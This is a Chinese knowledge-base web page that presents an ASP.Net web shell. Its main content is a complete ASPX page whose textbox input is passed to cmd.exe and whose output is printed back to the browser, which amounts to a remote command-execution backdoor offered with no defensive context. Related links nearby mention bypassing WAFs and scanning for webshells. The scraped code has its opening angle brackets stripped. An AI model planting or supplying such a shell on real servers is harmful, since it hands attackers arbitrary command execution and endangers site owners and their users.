主頁 > 知識(shí)庫 > 一個(gè)ASP.Net下的WebShell實(shí)例

一個(gè)ASP.Net下的WebShell實(shí)例

熱門標(biāo)簽:鄭州400電話辦理 聯(lián)通 戶外地圖標(biāo)注軟件手機(jī)哪個(gè)好用 智能電話營銷外呼系統(tǒng) 凱立德導(dǎo)航官網(wǎng)地圖標(biāo)注 地圖標(biāo)注和認(rèn)領(lǐng) 五常地圖標(biāo)注 萊蕪?fù)夂綦婁N機(jī)器人價(jià)格 長春呼叫中心外呼系統(tǒng)哪家好 電銷語音自動(dòng)機(jī)器人
代碼如下:
復(fù)制代碼 代碼如下:

%@ Page Language="C#" AutoEventWireup="true" %>
%@ Import Namespace="System.Runtime.InteropServices" %>
%@ Import Namespace="System.IO" %>
%@ Import Namespace="System.Data" %>
%@ Import Namespace="System.Reflection" %>
%@ Import Namespace="System.Diagnostics" %>
%@ Import Namespace="System.Web" %>
%@ Import Namespace="System.Web.UI" %>
%@ Import Namespace="System.Web.UI.WebControls" %>
script runat="server">
protected void exec(object sender, EventArgs e)
{
    string item = cmd.Text;
    Process p = new Process();
    p.StartInfo.FileName = "cmd.exe";
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardInput = true;
    p.StartInfo.RedirectStandardOutput = true;
    p.StartInfo.RedirectStandardError = true;
    p.StartInfo.CreateNoWindow = true;
    string strOutput = null;
    p.Start();
    p.StandardInput.WriteLine(item);
    p.StandardInput.WriteLine("exit");
    strOutput = p.StandardOutput.ReadToEnd();
    p.WaitForExit();
    p.Close();
    Response.Write("pre>");
    Response.Write(strOutput);
    Response.Write("/pre>");
}
    protected void Page_Load(object sender, EventArgs e)
    {
    }
/script>
form id="form1" runat="server">
asp:TextBox id="cmd" runat="server" Text="dir c:" />asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
/form>
您可能感興趣的文章:
  • PHP常見過waf webshell以及最簡單的檢測方法
  • PHP實(shí)現(xiàn)webshell掃描文件木馬的方法
  • php木馬webshell掃描器代碼
  • 精確查找PHP WEBSHELL木馬 修正版
  • 精確查找PHP WEBSHELL木馬的方法(1)
  • Webshell基礎(chǔ)知識(shí)深入講解

標(biāo)簽:宣城 衢州 湖州 福州 岳陽 西寧 西藏 紅河

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《一個(gè)ASP.Net下的WebShell實(shí)例》,本文關(guān)鍵詞  一個(gè),ASP.Net,下的,WebShell,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《一個(gè)ASP.Net下的WebShell實(shí)例》相關(guān)的同類信息!
  • 本頁收集關(guān)于一個(gè)ASP.Net下的WebShell實(shí)例的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章